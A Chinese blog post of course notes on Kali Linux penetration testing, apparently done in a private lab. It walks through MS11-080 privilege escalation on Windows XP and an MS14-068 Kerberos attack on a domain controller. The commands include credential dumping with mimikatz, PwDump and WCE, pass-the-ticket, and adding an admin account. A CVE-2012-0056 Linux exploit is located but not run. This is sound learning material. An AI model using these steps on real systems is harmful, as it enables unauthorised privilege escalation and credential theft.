本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程
- 使用 Ms011-080 获取 WinXP 的 SYSTEM 权限
- Win7 使用 Ms14-068 获取 域控制器的权限
- 利用 CVE-2012-0056 提升 linux 权限
###1. 使用 Ms011-080 获取 WinXP 的 SYSTEM 权限###
-
Ms011-080 对应补丁 Kb2592799
微软官网公告(https://technet.microsoft.com/library/security/ms11-080)
root@kali:~# searchsploit Ms11-080 ------------------------------------------ -------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ------------------------------------------ -------------------------------- Microsoft Windows - 'AfdJoinLeaf' Local P | exploits/windows/local/21844.rb Microsoft Windows XP/2003 - 'afd.sys' Loc | exploits/windows/local/18176.py ------------------------------------------ -------------------------------- root@kali:~# cp /usr/share/exploitdb/exploits/windows/local/18176.py . # 将文件拷贝到 英文版 WinXP 系统(有时候中文版 XP 也可以使用) # 首先查看 WinXP 是否安装了 对应更新 Kb2592799 WinXP -> 运行 -> appwiz.cpl -> 查看是否有安装 Kb2592799,有的话卸载掉
查看 WinXP下的文件路径
-
WinXP 上安装的 python 的运行环境
C:\Documents and Settings\kevin>cd \C:\>18176.py -O XP
启动任务管理器
结束 kevin 权限的 explorer 桌面程序
输入 explorer
启动 system 权限的 explorer 桌面程序
-
WinXP 无需安装 Pyhon 的运行环境
# 使用 python2 的 pyinstaller 将 python 文件进行打包 root@kali:~# apt-get install python-pip root@kali:~# pip install pyinstaller # 或者 WinXP 下,安装 python2.7 C:\>pyinstaller --onefile 18176.py 297 INFO: Building EXE from out00-EXE.toc 297 INFO: Appending archive to EXE C:\dist\18176.exe 328 INFO: Building EXE from out00-EXE.toc completed successfully.
# 打开文件目录,将文件复制到目标主机 C:\>whoami test C:\>net user test 本地组成员 *Users 全局组成员 *None # 查看文件位置
C:\>cd 111 C:\111>18176.exe -O XP
C:\WINDOWS\system32>whoami SYSTEM # 将自己添加为管理员组 C:\WINDOWS\system32>net localgroup administrators test /add 命令成功完成。
-
-
使用 Ms11-046 时目标主机蓝屏(Dos)
###2. Win7 使用 Ms14-068 获取 域控制器的权限 ###
安全脉搏链接(https://www.secpulse.com/archives/2874.html)】
-
使用 win2003 搭建域控制器
-
配置并连接域控制器
# 运行 -> dcpromo
# Win2003 设置成域控制器,配置静态 IP 地址 # Win2003 设置强密码 C:\>net user Administrator jlcssadmin2006... # Win7 设置 静态 IP 并将 DNS 设置为 Win2003 的IP地址 # Win7 加入域控制器
# 重启之后
-
修改 Win2003 中的域控制器的用户权限
# Win2003 -> 运行 -> dsa.msc
# Win7
# Win2003
# Win7 可以查看域控制器共享出来的文件等资源
-
-
使用漏洞代码攻击域控制器
-
获取攻击文件
# root@kali:~# searchsploit Ms14-068 ------------------------------------------ ---------------------------------- Exploit Title | Path | (/usr/share/ exploitdb/) ------------------------------------------ ---------------------------------- Microsoft Windows Kerberos - Privilege Es | exploits/windows/remote/35474.py ------------------------------------------ --------------------------------- root@kali:~# cp /usr/share/exploitdb/exploits/windows/remote/35474.py .
-
域环境下使用通用工具查看本地密码
C:\fgdump>PwDump.exe localhost # 仅是本地密码 C:\>wce-universal.exe # 结果是域控制器密码 C:\>wce-universal.exe -w Administrator\LAB:jlcssadmin C:\Win32>mimikatz.exe mimikatz # :: mimikatz # privilege::debug Privilege '20' OK mimikatz # kerberos::list mimikatz # sekurlsa::logonPasswords
-
漏洞利用过程
1. 首先在 kali 通过脚本生成一个票据文件 # ms14-068.py -u user@lab.com -s userSID -d dc.lab.com -u 用户名:登录用户名 -s userSID -d 域控制器名称:在 Win7 计算机名称处查看,不在域控是,可以用IP地址代替 2. 将票据文件拷贝到 win 系统里 # 拷贝 TGT_user1@lab.com.ccache 到windows系统 3. 在 win 系统里使用 mimikatz.exe 完成权限的提升 # mimikatz.exe log "kerberos::ptc TGT_user@lab.com.ccache" exit # 在 Win7 上使用本地用户登录 # 查看域账号的信息 C:\>net user \\WIN7-VM 的用户帐户 Administrator Guest John user1 user2 命令成功完成。 C:\Win32>whoami.exe /all [User] = "LAB\user3" S-1-5-21-3056505427-3800332898-2304591883-1111 # kali 报错缺少模块 root@kali:~# python 35474.py -u user3@lab.com -s S-1-5-21-3056505427-3800332898-2304591883-1111 -d 172.16.10.132 # 下载安装模块https://github.com/bidord/pykek
root@kali:~/Desktop/pykek-master# python ms14-068.py -u user3@lab.com -s S-1-5-21-3056505427-3800332898-2304591883-1111 -d 172.16.10.132 Password: [+] Building AS-REQ for 172.16.10.132... Done! [+] Sending AS-REQ to 172.16.10.132... Done! [+] Receiving AS-REP from 172.16.10.132... Done! [+] Parsing AS-REP from 172.16.10.132... Done! [+] Building TGS-REQ for 172.16.10.132... Done! [+] Sending TGS-REQ to 172.16.10.132... Done! [+] Receiving TGS-REP from 172.16.10.132... Done! [+] Parsing TGS-REP from 172.16.10.132... Done! [+] Creating ccache file 'TGT_user1@lab.com.ccache'... Done # 将文件拷贝到 Win7
# 在 Win7 下执行 C:\mimikatz\Win32>mimikatz.exe log "kerberos::ptc TGT_user3@lab.com.ccache" exit ![在这里插入图片描述](https://img-blog.csdnimg.cn/2019041316554383.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0tldmluaGFuc2Vy,size_16,color_FFFFFF,t_70) # 如果injecte成功 你有可能获得到了域管理session,那么klist看一下是否有了kerberos Ticket C:\mimikatz\Win32>klist 当前登录 ID 是 0:0x776bd 缓存的票证: (1) #0> 客户端: user3 @ LAB.COM 服务器: krbtgt/LAB.COM @ LAB.COM Kerberos 票证加密类型: RSADSI RC4-HMAC(NT) 票证标志 0x50a00000 -> forwardable proxiable renewable pre_authent 开始时间: 3/4/2018 2:00:45 (本地) 结束时间: 3/4/2018 12:00:44 (本地) 续订时间: 3/11/2018 2:00:44 (本地) 会话密钥类型: RSADSI RC4-HMAC(NT) C:\mimikatz\Win32>net use \\Win2003.lab.com\admin$ 命令成功完成。
-
3. 利用 CVE-2012-0056 提升 linux 权限
-
是一个关于 /proc/pid/mem 的漏洞
-
要求:linux 内核必须大于2.6.39
-
样例:使用 ubuntu11 系统
ubuntu11 官网链接(http://old-releases.ubuntu.com/releases/11.10/)
-
在 kali 中查询
root@kali:~# searchsploit 18411 --------------------------- ---------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) --------------------------- ---------------------------------- Linux Kernel 2.6.39 < 3.2. | exploits/linux/local/18411.c --------------------------- ------------------------------- root@kali:~# cp /usr/share/exploitdb/exploits/linux/local/18411.c .
# 下载了 ubuntu11,安装之后 ssh 没办法使用,文件无法导入,故无法演示 ,过程是这样的,使用 kali-1.1.0 演示一下结果。 # kali-1.1.0 已经打了这个漏洞的补丁了,故无结果。